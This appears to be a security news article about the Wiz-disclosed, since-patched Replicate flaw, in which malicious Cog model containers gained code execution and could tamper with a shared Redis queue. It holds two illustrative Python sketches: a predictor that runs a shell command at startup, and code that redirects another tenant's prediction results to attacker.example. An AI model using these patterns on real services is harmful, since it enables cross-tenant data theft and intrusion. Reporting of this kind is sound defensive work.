Cybersecurity experts have uncovered a significant security vulnerability in Replicate, an AI-as-a-service provider, that exposed customers’ proprietary AI models and sensitive data. The flaw allowed unauthorized access to AI prompts and results, jeopardizing the integrity and confidentiality of the data Replicate handles. It originated in the way AI models are packaged, which permits arbitrary code execution that threat actors could exploit to mount cross-tenant attacks via malicious models.
Replicate uses an open-source tool called Cog to containerize and package machine learning models, which can then be deployed in various environments, including Replicate’s own platform. Researchers from the cloud security firm Wiz demonstrated that a rogue Cog container could be uploaded to Replicate and used to achieve remote code execution on the service’s infrastructure with elevated privileges. From that foothold, they leveraged an established TCP connection to a Redis server instance inside a Kubernetes cluster hosted on Google Cloud Platform to inject arbitrary commands. Because that Redis server brokers the requests and responses of multiple customers, tampering with it could enable cross-tenant attacks that alter the results returned by other customers’ models.
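To make the packaging risk concrete, here is a minimal sketch of what a malicious Cog predictor could look like. Cog’s `BasePredictor` interface (`setup()` and `predict()`) is its real API; the payload below is invented purely for illustration and is not the researchers’ actual exploit.

```python
# Hypothetical sketch of how a malicious Cog model could gain code execution
# inside a hosting provider's infrastructure. The BasePredictor API is Cog's
# real interface; the payload is illustrative only.
import subprocess

from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self) -> None:
        # setup() runs when the container starts, before any prediction
        # request arrives, so code placed here executes on the service's
        # infrastructure as soon as the model is loaded.
        subprocess.Popen(["/bin/sh", "-c", "id > /tmp/proof_of_execution"])

    def predict(self, prompt: str = Input(description="Text prompt")) -> str:
        # A benign-looking predict() keeps the model behaving normally,
        # which helps a malicious container avoid attracting attention.
        return prompt
```

Because Cog containers are, by design, arbitrary code that the platform runs, the security boundary rests entirely on how well the host isolates each tenant’s container.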
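The cross-tenant angle can be sketched in the same spirit. The host, queue name, task schema, and `webhook` field below are all assumptions made for illustration; Wiz did not publish the exact internal layout. The point is simply why command access to a shared Redis broker is dangerous.

```python
# Hypothetical illustration of cross-tenant tampering via a shared Redis
# queue. Host, queue name, and task fields are invented for this sketch.
import json

import redis

r = redis.Redis(host="redis.internal", port=6379)  # assumed internal endpoint

# Pop a pending prediction task that belongs to another tenant...
raw_task = r.lpop("prediction-queue")  # hypothetical queue name
if raw_task:
    task = json.loads(raw_task)
    # ...and re-enqueue it with its callback pointed at an attacker-controlled
    # server, so the victim's prediction result is delivered to the attacker.
    task["webhook"] = "https://attacker.example/exfil"  # illustrative field
    r.lpush("prediction-queue", json.dumps(task))
```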
Attacks of this kind pose a severe risk to the accuracy and reliability of AI-driven outputs and could expose the proprietary knowledge or sensitive data involved in model training. Intercepting AI prompts could additionally reveal personally identifiable information (PII). The flaw was responsibly disclosed in January 2024 and has since been patched by Replicate; there is no evidence that it was exploited in the wild. The incident underscores the ongoing risks posed by malicious AI models and the importance of robust security measures in AI-as-a-service platforms.